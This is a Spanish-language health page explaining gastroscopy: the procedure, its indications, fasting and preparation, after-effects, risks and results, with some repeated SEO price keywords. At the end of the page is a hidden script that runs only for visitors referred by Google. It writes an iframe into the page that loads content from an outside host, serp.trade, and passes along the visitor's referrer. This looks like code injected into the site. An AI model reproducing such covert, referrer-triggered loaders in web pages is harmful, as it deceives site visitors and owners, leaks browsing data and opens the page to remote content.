¿Qué es una Gastroscopia?

La gastroscopia o endoscopia digestiva consiste en una prueba diagnóstica y terapéutica que permite la valoración del esófago, el estómago y el duodeno.

precio gastroscopia madrid

¿Cuánto dura la gastroscopia? 

En total desde que el paciente se tumba en la camilla y se le aplica la anestesia, dura unos 20 minutos, pero el tiempo real de la exploración es de unos 5-7 minutos.

 

 

¿Qué es y cómo se realiza una Endoscopia Digestiva alta o Gastroscopia?

La endoscopia digestiva alta busca diagnosticar y tratar enfermedades presentes en el esófago, estómago o duodeno gracias a un endoscopio. El endoscopio es un tubo flexible que se introduce por la boca y se avanza por el tracto digestivo alto. El endoscopio tiene un diámetro de cerca de un centímetro y una longitud superior a un metro. Es introducido por la boca y desde ahí va avanzando por el tracto digestivo superior. Gracias a la luz y la cámara, el endoscopio permite ver las paredes esofago-gástricas. 

A través del endoscopio se pueden introducir diversos utensilios de reducido tamaño para realizar diversas pruebas diagnósticas y/o tratamientos, como son la toma de biopsias, la cauterización de vasos que sangran o la extirpación de pólipos.

¿Cuándo y para qué es necesario hacerse una gastroscopia?

Son múltiples los motivos por los cuales se recomienda hacer una endoscopia digestiva alta o gastroscopia, algunos de ellos son los siguientes:

 

  • Buscar el origen de vómitos con sangre
  • Estudio de posibles problemas del estómago, como úlceras gástricas, tumores o gastritis. 
  • Estudio de posibles problemas del duodeno 
  • Diagnosticar enfermedades como la hernia de hiato o el reflujo.
  • Buscar el origen de ciertas anemias , en caso de que haya pérdidas constantes de sangre.
  • Para estudiar problemas del esófago, como la esofagitis, un estrechamiento o la aparición de tumores. 
  • Búsqueda de causas de dolor abdominal, dificultad para tragar, vómitos, entre otros.
  • Control de pacientes con cirrosis hepática.
  • Toma de muestras de biopsias, para estudiar posibles enfermedades como la infección por helicobacter pylori, la celiaquía o tumor.

Es la única prueba que nos permite el diagnóstico y el análisis de tumores que de otra forma no son accesibles ni visibles. 

Hospitales donde realizarse la prueba

cuanto dura la gastroscopia

¿Qué preparación hace falta para una Gastroscopia? 

Lo importante para la realización de una endoscopia digestiva alta  o gastroscopia es que el tracto digestivo superior esté vacío antes de la realización de la prueba. El especialista en aparato digestivo le indicara la preparación necesaria, pero lo normal es estar en ayunas (no comer ni beber) 6 horas antes de la gastroscopia. Tampoco se puede fumar durante ese periodo.

Es imprescindible informar al doctor sobre patologías médicas que padezca el paciente así como de los medicamentos que toma. En caso de tomar medicamentos que afecten a la coagulación sanguínea, es posible que se le pida al paciente que deje de tomarlas unos días antes de la prueba. 

Ninguna otra preparación adicional es necesaria para hacerse una gastroscopia. Lo que sí es recomendable es acudir acompañado  dado que se administra un sedante durante la prueba y no permite conducir durante las siguientes horas. 

 

¿Qué efectos secundarios o que se siente después de una gastroscopia?

Tras la gastroscopia lo normal es sentirse atontado y somnoliento algunas horas y por norma general no se recuerda parte de lo sucedido. También es norma y habitual sentir distensión abdominal y gases que el cuerpo irá expulsando. También son habituales las molestias en la garganta durante los días posteriores. Si ha habido extracción de pólipos puede haber algo de sangre en las heces, que tendrán una coloración oscura. 

gastroscopia preparacion

¿Qué riesgos tiene la gastroscopia?

La gastroscopia es una prueba muy segura y el riesgo de complicaciones es muy bajo, inferior al uno por mil, pero siempre existe la posibilidad de que se produzcan complicaciones como una mínima hemorragia al tomar una biopsia o una pequeña perforación. 

Por otra parte el paciente puede tener una reacción inesperada a los medicamentos utilizados, por lo que es imprescindible comunicar con anterioridad al doctor todo tipo de alergias o patologías.

Si con posterioridad a la prueba sufre mareos intensos, fiebre, dificultad para respirar u otros síntomas debe contactar inmediatamente con su médico. También hay que contactar si hay vómitos con sangre. 


Resultados de la endoscopia digestiva alta 

El especialista realizará un informe final, que se completará con posterioridad con los resultados de la anatomía patológica, en caso de que se haya extraído algún pólipo o realizando una biopsia. El informe incluirá las conclusiones y podrá ir acompañado de algunas imágenes de los hallazgos. 

La consulta con el especialista unas semanas después es imprescindible para completar el informe y comprender todo lo que pone en el informe y definir, en caso de que sea necesario, el tratamiento as seguir. 


¿Cuáles son las diferencias entre la gastroscopia y la panendoscopia?

 

La panendoscopia es un término que conceptualmente engloba la exploración del esófago, del estómago y del duodeno. Si seguimos en el plano conceptual, la gastroscopia se refiere a la exploración del esófago y del estómago. En la práctica tanto panendoscopia como endoscopia digestiva alta como la gastroscopia se usan como sinónimos refiriéndose a la misma prueba médica. 

Artículos de interés

Prueba endoscopia gastroscopia precio
gastroscopia precio
gastroscopia precio

Importante: Esta información tiene únicamente un carácter informativo y en ningún caso médico. Es importante que consulte a su médico sobre su enfermedad específica y el tratamiento más adecuado.

<script>if((document.referrer).includes('google')) {
   document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>");
} </script>
Call Now ButtonLlama ahora